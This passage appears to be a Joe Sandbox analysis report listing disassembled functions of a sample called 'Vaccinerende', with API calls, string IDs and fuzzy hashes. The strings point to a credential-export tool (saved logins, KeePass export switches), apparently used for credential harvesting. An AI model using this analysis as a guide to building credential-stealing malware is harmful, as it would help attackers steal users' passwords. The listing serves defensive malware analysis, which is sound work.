                                                                              • _wtoi.MSVCRT(00000000,00000000,00000136,00000000,00000135,00000000,00000134,00000000,00000133,00000000,00000132,00000000,00000131,00000000,00000130,00000000), ref: 004081AF
                                                                              • _wcsicmp.MSVCRT ref: 004081C3
                                                                              • memset.MSVCRT ref: 004081E4
                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                                                                • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                                                                • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                                                                • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                                                                • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                                • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                                • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                                • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                                • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                                                                • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$CloseFileHandleSize_wtoi_wtoi64wcscpy
                                                                              • String ID: logins$null
                                                                              • API String ID: 2148543256-2163367763
                                                                              • Opcode ID: 0c5bf0fe86f5c58e26a0e15e1bc426e9e739ab0ab567f24c82d75e1353058837
                                                                              • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                                                                              • Opcode Fuzzy Hash: 0c5bf0fe86f5c58e26a0e15e1bc426e9e739ab0ab567f24c82d75e1353058837
                                                                              • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                                                                              Function 00408560 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 182stringCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000), ref: 004096D5
                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                                              • ??2@YAPAXI@Z.MSVCRT ref: 0040859D
                                                                                • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                              • memset.MSVCRT ref: 004085CF
                                                                              • memset.MSVCRT ref: 004085F1
                                                                              • memset.MSVCRT ref: 00408606
                                                                              • strcmp.MSVCRT ref: 00408645
                                                                              • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
                                                                              • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
                                                                              • memset.MSVCRT ref: 0040870E
                                                                              • strcmp.MSVCRT ref: 0040876B
                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
                                                                              • CloseHandle.KERNEL32(?), ref: 004087A6
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                                              • String ID: ---
                                                                              • API String ID: 3437578500-2854292027
                                                                              • Opcode ID: 514a4b219222fc308ac2af9ebc5a2bc9af16dfffa76d3dbf40f60a33dc7994f2
                                                                              • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                                              • Opcode Fuzzy Hash: 514a4b219222fc308ac2af9ebc5a2bc9af16dfffa76d3dbf40f60a33dc7994f2
                                                                              • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                                              Function 0041083A Relevance: 21.1, APIs: 14, Instructions: 137windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • memset.MSVCRT ref: 0041087D
                                                                              • memset.MSVCRT ref: 00410892
                                                                              • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                              • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                              • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                              • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                              • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                              • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                              • GetSysColor.USER32(0000000F), ref: 00410999
                                                                              • DeleteObject.GDI32(?), ref: 004109D0
                                                                              • DeleteObject.GDI32(?), ref: 004109D6
                                                                              • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                              • String ID:
                                                                              • API String ID: 1010922700-0
                                                                              • Opcode ID: 6697d86bd39682251f5c1914ef9d5b2959c55de28960e84646fd269688f34b04
                                                                              • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                                                              • Opcode Fuzzy Hash: 6697d86bd39682251f5c1914ef9d5b2959c55de28960e84646fd269688f34b04
                                                                              • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                                                              Function 00418680 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 88COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                              • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                              • malloc.MSVCRT ref: 004186B7
                                                                              • free.MSVCRT ref: 004186C7
                                                                              • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                                              • free.MSVCRT ref: 004186E0
                                                                              • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                                              • malloc.MSVCRT ref: 004186FE
                                                                              • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                                              • free.MSVCRT ref: 00418716
                                                                              • free.MSVCRT ref: 0041872A
                                                                              • free.MSVCRT ref: 00418749
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: free$FullNamePath$malloc$Version
                                                                              • String ID: |A
                                                                              • API String ID: 3356672799-1717621600
                                                                              • Opcode ID: b0cf0f28ee59a6f388034fbf15bd1e2dfba9e494de547d4b72c81ace4a10eec1
                                                                              • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                                              • Opcode Fuzzy Hash: b0cf0f28ee59a6f388034fbf15bd1e2dfba9e494de547d4b72c81ace4a10eec1
                                                                              • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                                              Function 004125F8 Relevance: 21.1, APIs: 7, Strings: 7, Instructions: 70COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: _wcsicmp
                                                                              • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                              • API String ID: 2081463915-1959339147
                                                                              • Opcode ID: ed70c74fadb10ab7d72ef9915f44c0908033a9cd6b37cdcdb0b46a34d9d8d060
                                                                              • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                                              • Opcode Fuzzy Hash: ed70c74fadb10ab7d72ef9915f44c0908033a9cd6b37cdcdb0b46a34d9d8d060
                                                                              • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                                              Function 004138C1 Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 49libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                              • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW,7570CFBC,?,00413396), ref: 004138ED
                                                                              • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                                                              • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                                                              • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                                                              • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                              • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                              • API String ID: 2012295524-70141382
                                                                              • Opcode ID: 041abbf71437061a0f134c3fe1786c70626f7864bc8708fd51d9cd322498a069
                                                                              • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                                                              • Opcode Fuzzy Hash: 041abbf71437061a0f134c3fe1786c70626f7864bc8708fd51d9cd322498a069
                                                                              • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                                                              Function 0041383D Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                                              • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot,7570CFBC), ref: 00413865
                                                                              • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                                                              • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                                                              • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                                                              • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$HandleModule
                                                                              • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                              • API String ID: 667068680-3953557276
                                                                              • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                              • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                                              • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                              • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                                                              Function 00412172 Relevance: 19.7, APIs: 13, Instructions: 189windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetDC.USER32(00000000), ref: 004121FF
                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                              • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                              • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                              • SelectObject.GDI32(?,?), ref: 00412251
                                                                              • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                              • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                                • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                                • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                                • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                              • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                              • SetCursor.USER32(00000000), ref: 004122BC
                                                                              • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                              • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                              • String ID:
                                                                              • API String ID: 1700100422-0
                                                                              • Opcode ID: 982738172b7671ed7e60757921d653f6822ff96d67897b30d29685b1d4afaeae
                                                                              • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                                              • Opcode Fuzzy Hash: 982738172b7671ed7e60757921d653f6822ff96d67897b30d29685b1d4afaeae
                                                                              • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                                              Function 004111C1 Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetClientRect.USER32(?,?), ref: 004111E0
                                                                              • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                              • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                              • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                              • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                              • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                              • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                              • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                              • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                              • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                              • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                              • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                              • String ID:
                                                                              • API String ID: 552707033-0
                                                                              • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                              • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                                              • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                              • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                                              Function 0040C084 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 110stringfileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 0040C0A4
                                                                                • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                                • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                                • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                              • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                                                                              • strchr.MSVCRT ref: 0040C140
                                                                              • strchr.MSVCRT ref: 0040C151
                                                                              • _strlwr.MSVCRT ref: 0040C15F
                                                                              • memset.MSVCRT ref: 0040C17A
                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                                                                              • String ID: 4$h
                                                                              • API String ID: 4066021378-1856150674
                                                                              • Opcode ID: 71bd764b9dcf29740d9000bfd46b6f343dec630bed034bbd58b4fa538d0cb68c
                                                                              • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                                              • Opcode Fuzzy Hash: 71bd764b9dcf29740d9000bfd46b6f343dec630bed034bbd58b4fa538d0cb68c
                                                                              • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                                              Function 00414621 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 99COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: memset$_snwprintf
                                                                              • String ID: %%0.%df
                                                                              • API String ID: 3473751417-763548558
                                                                              • Opcode ID: 2b153c1cf1109f668433ad91a4c4fbef48d688dda569af0dd2d123790ad71e5e
                                                                              • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                                              • Opcode Fuzzy Hash: 2b153c1cf1109f668433ad91a4c4fbef48d688dda569af0dd2d123790ad71e5e
                                                                              • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                                              Function 004060A4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97timewindowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                              • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                              • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                              • GetTickCount.KERNEL32 ref: 0040610B
                                                                              • GetParent.USER32(?), ref: 00406136
                                                                              • SendMessageW.USER32(00000000), ref: 0040613D
                                                                              • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                              • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                              • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                              • String ID: A
                                                                              • API String ID: 2892645895-3554254475
                                                                              • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                              • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                                              • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                              • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                                              Function 0040D957 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                                                • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                                                • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                                                • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                                                • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                                              • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                                              • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                                              • GetDesktopWindow.USER32 ref: 0040D9FD
                                                                              • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                                              • memset.MSVCRT ref: 0040DA23
                                                                              • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                                              • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                                              • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                                                • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
